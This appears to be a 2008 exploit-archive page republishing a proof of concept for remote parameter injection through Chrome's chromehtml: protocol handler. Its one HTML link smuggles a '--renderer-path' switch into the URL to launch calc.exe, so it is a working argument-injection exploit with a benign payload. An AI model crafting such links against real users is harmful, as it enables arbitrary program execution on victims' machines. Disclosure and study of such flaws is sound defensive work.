Google Chrome Browser (ChromeHTML://) Remote Parameter Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
# Published : 2008-12-23
# Author : Nine:Situations:Group
# Previous Title : Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit
# Next Title : webcamXP 5.3.2.375 Remote File Disclosure Vulnerability

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:windowssystem32calc.exe"%20--"'>click me</a>

# www.Syue.com [2008-12-23]